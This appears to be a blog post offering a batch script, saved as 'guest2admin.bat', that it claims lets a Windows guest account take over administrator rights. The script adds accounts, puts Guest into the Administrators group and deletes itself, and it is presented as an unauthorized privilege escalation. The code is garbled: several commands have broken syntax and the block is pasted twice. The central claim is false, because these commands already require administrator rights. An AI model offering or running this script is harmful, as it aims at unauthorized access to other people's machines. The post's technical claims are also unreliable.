Hate working in guest account me too!!! I found out how to
hack Admin with Guest account although I have posted another trick before also see Hack
Admin password With CMD.
Procedure
to hack admin password with guest:
1.
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
2.
Type the above
code in notepad
3.
Save above file
as “guest2admin.bat”
4.
Now double click
after saving
No comments:
Post a Comment